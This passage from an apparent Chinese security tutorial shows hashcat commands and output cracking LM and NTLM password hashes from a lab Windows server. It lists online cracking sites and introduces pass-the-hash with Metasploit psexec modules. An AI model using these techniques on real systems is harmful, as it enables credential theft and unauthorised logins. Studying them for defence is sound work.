因为LM Hash长度最长是14个字符 , 密码被分成2个长度为7的字符进行存放 , 所以这里Hashcat破解的时候也是分2半部分来分别进行破解的:
4a3b108f3fa6cb6d:D
921988ba001dc8e1:P@SSW0R
Session..........: hashcat
Status...........: Cracked
Hash.Type........: LM
Hash.Target......: 921988ba001dc8e1, 4a3b108f3fa6cb6d
Time.Started.....: Tue Nov 19 00:05:18 2019 (0 secs)
Time.Estimated...: Tue Nov 19 00:05:18 2019 (0 secs)
Guess.Base.......: File (password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.# 2.........: 1291 H/s (0.16ms) @ Accel:32 Loops:1 Thr:64 Vec:1
Speed.# 3.........: 0 H/s (0.00ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.# *.........: 1291 H/s
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 8/8 (100.00%)
Rejected.........: 0/8 (0.00%)
Restore.Point....: 0/8 (0.00%)
Restore.Sub.# 2...: Salt:0 Amplifier:0-1 Iteration:0-1
Restore.Sub.# 3...: Salt:0 Amplifier:0-0 Iteration:0-1
Candidates.# 2....: ADMIN -> D
Candidates.# 3....: [Copying]
可以看到先破解出了:D , 然后破解出了P@SSW0 比较蛋疼的是 LM Hash不区分大小写 , 所以我们还得凭感觉去猜出具体的密码 。
Hashcat破解NTLM Hash
hashcat -a 0 -m 1000 --force 'e19ccf75ee54e06b06a5907af13cef42' password.txt
破解成功 , 得到如下结果:
e19ccf75ee54e06b06a5907af13cef42:P@ssw0rd
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NTLM
Hash.Target......: e19ccf75ee54e06b06a5907af13cef42
Time.Started.....: Mon Nov 18 23:44:55 2019 (0 secs)
Time.Estimated...: Mon Nov 18 23:44:55 2019 (0 secs)
Guess.Base.......: File (password.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.# 2.........: 0 H/s (0.00ms) @ Accel:64 Loops:1 Thr:64 Vec:1
Speed.# 3.........: 985 H/s (0.06ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Speed.# *.........: 985 H/s
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 5/5 (100.00%)
Rejected.........: 0/5 (0.00%)
Restore.Point....: 0/5 (0.00%)
Restore.Sub.# 2...: Salt:0 Amplifier:0-0 Iteration:0-1
Restore.Sub.# 3...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.# 2....: [Copying]
Candidates.# 3....: admin -> P@ssw0rd
在线Hash破解
Objectif Sécurité - Ophcrack
https://www.objectif-securite.ch/ophcrack
一个国外的老牌Hash破解网站 , 填入NTLM Hash值即可:
文章插图
CMD5.com
https://cmd5.com
国内的CMD5.com 也支持NTLM类型的Hash破解 , 直接粘贴进去系统会自动解密 , 也是比较方便的:
文章插图
还有其他很多的在线网站就不推荐了 , 这里就只列举这两个用的比较多的网站
Hash传递
简介
PASS THE Hash也叫Hash传递攻击,简称PTH 。模拟用户登录不需要用户明文密码只需要就可以直接用获取到的Hash来登录目标系统 。
利用成功的前提条件是:
• 开启445端口 SMB服务
• 开启admin$共享
这里目标Windows Server 2008 R2(10.211.55.4)通过mimikatz抓取到的Administrator用户的Hash为:
* LM : 921988ba001dc8e14a3b108f3fa6cb6d
* NTLM : e19ccf75ee54e06b06a5907af13cef42
通过QuarksDump抓取到的Administrator用户的Hash为:
Administrator:500:AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42:::
经过国光测试 , 在下面Hash传递的时候 , 只要后面的NTLM Hash是正确的 , 前面填写什么都是可以顺利登陆成功的 , 经过测试 , 如下Hash可以成功:
AAD3B435B51404EEAAD3B435B51404EE:E19CCF75EE54E06B06A5907AF13CEF42
921988ba001dc8e14a3b108f3fa6cb6d:E19CCF75EE54E06B06A5907AF13CEF42
00000000000000000000000000000000:E19CCF75EE54E06B06A5907AF13CEF42
66666666666666666666666666666666:E19CCF75EE54E06B06A5907AF13CEF42
也就是说:
E19CCF75EE54E06B06A5907AF13CEF42部分起到关键的认证作用 , 前面的只要位数正确 , 填写啥都没有问题 。下面是具体的演示 。
Metasploit
Metasploit下面有3个psexec模块都可以进行Hash传递利用 , 他们分别是:
# 执行单个命令的PTH模块auxiliary/admin/smb/psexec_command
# 执行直接就获取到meterpreter的PTH模块exploit/windows/smb/psexec
# 支持对一个网段进行PTH进行验证的模块exploit/windows/smb/psexec_psh
auxiliary/admin/smb/psexec_command
推荐阅读
- 电脑右下角弹窗广告怎么关闭win10?windows10桌面弹出广告?
- 如何永久激活Windows10系统专业版教程
- Windows WDS服务安装配置
- 手把手教你用上更好看的新版 Windows开始菜单
- Windows 10 2004版本如何使用小娜?
- Windows 这些没用的设置,我建议你还是趁早关闭吧
- Windows7固态硬盘卡顿假死怎么办?这个方法照做就能轻松解决
- 网络性能debug参数整理
- 人力资源|藏在裁员大数据中的企业密码
- 量子密码技术 量子密码的安全性